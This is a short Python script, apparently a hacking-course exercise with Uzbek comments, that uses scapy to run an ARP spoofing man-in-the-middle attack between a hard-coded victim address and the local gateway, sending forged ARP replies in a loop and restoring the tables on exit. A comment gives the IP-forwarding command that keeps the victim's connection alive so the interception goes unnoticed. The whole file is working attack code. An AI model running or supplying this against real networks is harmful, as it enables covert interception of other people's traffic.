#!/usr/bin/env python
#Dasturni ishga tushurgach jabrlanuvchi kampyuterida internet ishlamay qolsa quyudagi kod kiritiladi
#echo 1 > /proc/sys/net/ipv4/ip_forward

import scapy.all as scapy
import time
from datetime import date
from datetime import datetime
import optparse

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answerad_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answerad_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
    target_mac = get_mac(spoof_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

def restore(destination_ip, source_ip):
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)

target_ip = "192.168.1.13"
spoof_ip = "192.168.1.1"

now1 = datetime.now()
sent_packets_count = 0

try:
    while True:
        spoof(target_ip, spoof_ip)
        spoof(spoof_ip, target_ip)
        sent_packets_count = sent_packets_count + 2
        print("\r[+] Packets sent: " + str(sent_packets_count), end="")
        time.sleep(2)
except KeyboardInterrupt:
    now2 = datetime.now()

    print("\n[+] Detected CTRL + C ...Resetting ARP tables...Please wait. \n[+] Work statistics:")
    print("- Total ARP packets sent: " + str(sent_packets_count))
    print("- Attack start time: " + str(now1))
    print("- Attack start time: " + str(now2))
    print("- Attack duration:" + str(now2-now1))

    restore(target_ip, spoof_ip)
    restore(spoof_ip, target_ip)
